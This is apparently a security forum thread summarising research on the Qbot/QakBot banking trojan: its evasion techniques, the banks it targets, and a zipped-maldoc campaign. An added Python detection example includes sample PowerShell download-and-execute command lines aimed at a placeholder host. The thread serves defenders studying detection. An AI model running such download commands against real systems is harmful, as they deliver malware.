Targeting U.S. banks, Qbot trojan evolves with new evasion techniques

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,176
By malware standards, the banking trojan Qbot is long in the tooth, but it still has some bite, according to researchers who say it has added some detection and research evasion techniques to its arsenal.

“It has a new packing layer that scrambles and hides the code from scanners and signature-based tools,” wrote Doron Voolf, malware analyst at F5 Labs (part of F5 Networks), in a recent company blog post. “It also includes anti-virtual machine techniques, which helps it resist forensic examination.”

This latest sample was programmed to harvest credentials primarily from U.S. banks and their online financial services offerings. F5 identified 36 targeted U.S. financial institutions and two banks in Canada and the Netherlands, including J.P. Morgan, Citibank, Fifth Third Bank, U.S. Bancorp, Citizens Bank, Keybank, Bank of America, Capital One, First Citizens Bancshares, First Horizon Bank, SunTrust, Compass Bank, TD Bank, Wells Fargo, Frost Bank, TCF Bank, Huntington Bancshares, M&T Bank, Scotiabank, First Merit Corporation, Eastern Bank, ABN AMRO, PNC Bank, Silicon Valley Bank and others. The researchers also found six generic URL targets “that might be added as a second stage in the fraud action.”
 

silversurfer

Morphisec Labs has tracked a massive maldoc campaign delivering the QakBot/QBot banking trojan, starting earlier this month. Qakbot leverages advanced techniques to evade detection and hamper manual analysis of the threat. In this post we will mention two of those interesting techniques.
QakBot attacks typically include a malicious attachment to a phishing email. Often these are bare Microsoft Word documents attached to the spam email. This particular campaign features a ZIP file; within the ZIP attachment is a Word document that includes macros within the document. These macros execute a PowerShell script that then downloads the Qakbot payload from specific URLs.
This particular campaign also includes two new techniques: a bypass of the content disarm and reconstruction (CDR) technology through zipping the Word document, and a bypass of parent-child pattern detection because Visual Basic is executed using Explorer.
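Detection-side illustration of the parent/child evasion described in this post (added example, not code from the Morphisec write-up): constructed Sysmon-style process-creation events, a naive Word-spawns-PowerShell rule that misses the Explorer hand-off, and an ancestry walk that catches it. The extra check for PowerShell started by explorer.exe with a URL on its command line is an assumed heuristic, not something the post states.

```python
"""Process-tree detection for maldoc -> PowerShell chains (added example)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # lower-case executable name, e.g. "winword.exe"
    cmdline: str


# Constructed sample telemetry (Sysmon Event ID 1 style), not real data.
# 100: the user's desktop shell.  200->201: Word spawns PowerShell directly.
# 300->301->302: Word hands off to Explorer, which spawns the downloader.
# 400: benign PowerShell from Explorer.  500: Explorer-launched downloader.
EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "winword.exe", "WINWORD.EXE invoice.doc"),
    ProcEvent(201, 200, "powershell.exe", "powershell -w hidden -c IEX(...)"),
    ProcEvent(300, 100, "winword.exe", "WINWORD.EXE report.doc"),
    ProcEvent(301, 300, "explorer.exe", "explorer.exe stage.lnk"),
    ProcEvent(302, 301, "powershell.exe", "powershell -nop -c iwr http://example.invalid/q.exe"),
    ProcEvent(400, 100, "powershell.exe", "powershell Get-ChildItem"),
    ProcEvent(500, 100, "powershell.exe", "powershell -c iwr https://example.invalid/p.exe"),
]

OFFICE = {"winword.exe", "excel.exe"}
URL_RE = re.compile(r"https?://", re.I)


def ancestors(pid, index):
    """Yield image names walking up the parent chain; stop at unknown/cyclic pids."""
    seen = set()
    while pid in index and pid not in seen:
        seen.add(pid)
        yield index[pid].image
        pid = index[pid].ppid


def direct_parent_rule(events):
    """Naive rule: PowerShell whose immediate parent is an Office application."""
    idx = {e.pid: e for e in events}
    return sorted(e.pid for e in events if e.image == "powershell.exe"
                  and e.ppid in idx and idx[e.ppid].image in OFFICE)


def ancestry_rule(events):
    """Flag PowerShell with Office anywhere in its lineage, or (assumed heuristic)
    launched by explorer.exe with a URL on its command line."""
    idx = {e.pid: e for e in events}
    hits = []
    for e in (x for x in events if x.image == "powershell.exe"):
        parent = idx.get(e.ppid)
        if OFFICE & set(ancestors(e.ppid, idx)):
            hits.append(e.pid)
        elif parent and parent.image == "explorer.exe" and URL_RE.search(e.cmdline):
            hits.append(e.pid)
    return sorted(hits)
```

Run against the sample events, the direct-parent rule only reports pid 201, while the ancestry walk also reports 302 and 500 and leaves the benign 400 alone.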
 
